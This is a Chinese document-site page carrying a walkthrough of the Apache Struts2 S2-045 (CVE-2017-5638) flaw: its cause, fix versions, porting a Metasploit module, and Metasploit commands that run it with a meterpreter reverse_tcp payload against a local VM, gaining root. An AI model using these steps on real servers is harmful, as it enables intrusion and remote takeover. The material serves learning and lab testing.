欢迎来到中国文库网! | 帮助中心 分享价值,成长自我!
中国文库网
全部分类
  • 实用文档 >
    实用文档
    求职/职场 PPT模板库 总结/汇报/计划 主持/演讲稿/致辞/ 思想汇报/心得体会 规章制度 调研述职 学习专题 行政公文 合同协议 方案/研究报告 说明文档 其它范文模版
  • 专业资料 >
    专业资料
    经管营销 IT/计算机 工程科技 人文社科 自然科学 医药卫生 农林牧渔
  • 教育资料 >
    教育资料
    幼儿教育 小学教育 初中教育 高中教育 职业教育 成人教育 高等教育 其它教育资料
  • 资格认证/考试 >
    资格认证/考试
    公务员考试 成考 自考 专升本考试 教师资格考试 司法考试 微软认证 思科认证 注册会计师 全国翻译资格认证 医师/药师资格考试 会计职称考试 报关员资格考试 人力资源管理师 安全工程师考试 出国培训 资产评估师考试 技工类职业技能考试 银行从业资格 计算机等级考试 营养师认证 物流师考试 证券从业资格考试 注册税务师 理财规划师 建筑师考试 质量管理体系认证 建造师考试 英语四六级 英语专业四八级 GRE 雅思/LSAT 托福 其它
  • 学术论文/大学论文 >
    学术论文/大学论文
    毕业论文 期刊/会议论文 管理论文 社科论文 文学论文 开题报告 经济论文 法律论文 医学论文 哲学论文 艺术论文 通讯论文 自然科学论文 论文指导/设计 其它论文
  • 生活休闲专区 >
    生活休闲专区
    饮食 游戏 体育/运动 音乐 旅游购物 娱乐时尚 美容化妆 家具家电 社会民生 影视/动漫 保健养生 随笔 摄影摄像 幽默滑稽 综合/其它
  • 首页 中国文库网 > 资源分类 > DOCX文档下载

    metasploit之移植S2-045漏洞代码模块实战提权.docx

    • 资源大小:280.88KB        全文页数:7页
    • 资源格式: DOCX        下载权限:游客/注册会员/VIP会员    下载费用:0金币 【人民币0元】
    游客快捷下载 游客一键下载
    会员登录下载
    下载资源需要0金币 【人民币0元】

    邮箱/手机:
    温馨提示:
    系统会根据您填写的邮箱或者手机号作为您下次登录的用户名和密码(如填写的是手机,那登陆用户名和密码就是手机号),方便下次登录下载和查询订单;
    特别说明:
    请自助下载,系统不会自动发送文件的哦;
    验证码:   换一换

          加入VIP,免费下载资源
     
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,既可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰   

    metasploit之移植S2-045漏洞代码模块实战提权.docx

    metasploit 之移植 S2-045 漏洞代码模块实战提权2017 年 4 月 13 日发布首页/技术/正文6,07300导语2017 年 3 月的某一天,国家信息安全漏洞库(CNNVD )收到杭州安恒信息技术有限公司(CNNVD 一级技术支撑单位)关于 Apache Struts2 (S2-045)远程代码执行漏洞(CNNVD-201703-152)的情况报送。2017 年 3 月的某一天,国家信息安全漏洞库(CNNVD )收到杭州安恒信息技术有限公司(CNNVD 一级技术支撑单位)关于 Apache Struts2 (S2-045)远程代码执行漏洞(CNNVD-201703-152)的情况报送。由于该漏洞影响范围广,危害级别高,利用 POC 更是迅速在网上爆出,一瞬间网络上烽烟四起,血流成河。001 Apache Struts2(S2-045 )漏洞简介Apache Struts 是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级 Java Web 应用的开源 MVC 框架,主要提供两个版本框架产品Struts 1 和 Struts 2。Struts2 是一个基于 MVC 设计模式的Web 应用框架,它本质上相当于一个 servlet,在 MVC 设计模式中,Struts2作为控制器Controller来建立模型与视图的数据交互。Struts 2 是 Struts 的下一代产品,是在 struts 1 和 WebWork 的技术基础上进行了合并的全新的Struts 2 框架。Apache Struts 2.3.5 – 2.3.31 版本及 2.5 – 2.5.10 版本存在远程代码执行漏洞(CNNVD-201703-152,CVE-2017-5638 )。该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息。导致远程攻击者可通过发送恶意的数据包,利用该漏洞在受影响服务器上执行任意命令。002 S2-045 漏洞的原理1、基于 Jakarta(Jakarta Multipart parser)插件的文件上传功能2、恶意攻击者精心构造 Content-Type 的值3、通过版本比对定位漏洞原因coresrcmainjavaorgapachestruts2dispatchermultipartMultiPartRequestWrapper.javacoresrcmainjavaorgapachestruts2dispatchermultipartJakartaMultiPartRequest.javacoresrcmainjavaorgapachestruts2dispatchermultipartJakartaStreamMultiPartRequest.java003 S2-045 漏洞的危害及修复措施攻击者可通过发送恶意构造的 HTTP 数据包利用该漏洞,在受影响服务器上执行系统命令,进一步可完全控制该服务器,造成拒绝服务、数据泄露、网站造篡改等影响。由于该漏洞利用无需任何前置条件(如开启 dmi,debug 等功能)以及启用任何插件,因此漏洞危害较为严重。受影响用户可升级版本至 Apache Struts 2.3.32 或 Apache Struts 2.5.10.1以消除漏洞影响。官方公告https//cwiki.apache.org/confluence/display/WW/S2-045fromgroupmessageisappinstalled0004 移植 S2-045 漏洞利用代码模块Metasploit 集合了大量的系统漏洞利用代码,但并不是拥有所有的漏洞代码,所以 Metasploit 有一个非常强大的功能,它允许使用者开发自己的漏洞模块,s2-045 的漏洞利用模块 Metasploit 虽然还没有集成,但是网络上已经有相应的渗透模块了,这些模块可能是用各种语言编写的,比如 perl、python 等,Metasploit 支持各种不同语言编写的模块移植到其框架中,通过这种机制可以将各种现存的模块软件移植成为与 Metasploit 兼容的渗透模块。我们先在 github 下载 S2-045 漏洞利用 ruby 脚本,该脚本已经经过作者测试,可以直接使用,下载地址https//github.com/rapid7/metasploit-framework/pull/8072,如下图所示。把该 code 的内容 COPY 下来,保存为 struts2_code_exec_jakarta.rb,然后把它放到 KALI 系统的/usr/share/metasploit-framework/modules/exploits/multi/http/下面。如下图所示。了解漏洞利用代码模块存储的文件夹位置非常重要,有助于我们寻找不同模块所在位置,也有助于 Metasploit 框架理解模块的基本用法。完整的模块脚本构建完成滞后,在合适的位置保存。现在我们去 MSF 下面搜索 struts2 就可以搜到该脚本了,如下图所示。005 Metasploit 下 S2-045 漏洞提权实战利用S2-045 漏洞利用代码移植到 Metasploit 框架中后,我们就可以开始渗透测试了,关于怎么获取测试存在该漏洞的方法方法前面已经讲的很详细了,这里就不再重复了,此处我们用本地虚拟机搭建的平台来测试,存在漏洞的网址为 127.0.0.1/memocreate.action。见下图。启动 Metasploit,使用该漏洞模块,并设置好相应 payload,这里因为我的虚拟机是 linux 的,所以这里用 linux 的 payload,接着查看下该模块具体参数,如下图所示。use exploit/multi/http/struts2_code_exec_jakartaset payload linux/x86/meterpreter/reverse_tcpshow options这里我们输入如下命令按实际情况进行设置,见下图。Set RHOST 127.0.0.1set RPORT 80Set TARGETURI /memocreate.actionSet LHOST 192.168.2.83Run攻击完成后,我们进入 shell 下可以看到,当前已经是 root 权限了,利用 S2-045 漏洞入侵已经成功。如下图所示。TheEnd.

    注意事项

    本文(metasploit之移植S2-045漏洞代码模块实战提权.docx)为本站会员(520AC)主动上传,中国文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知中国文库网(发送邮件至[email protected]或直接QQ联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。

    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服客服 - 联系我们

    [email protected] 2018 zgwenku网站版权所有
    ICP备案编号:蜀ICP备18016090号

    收起
    展开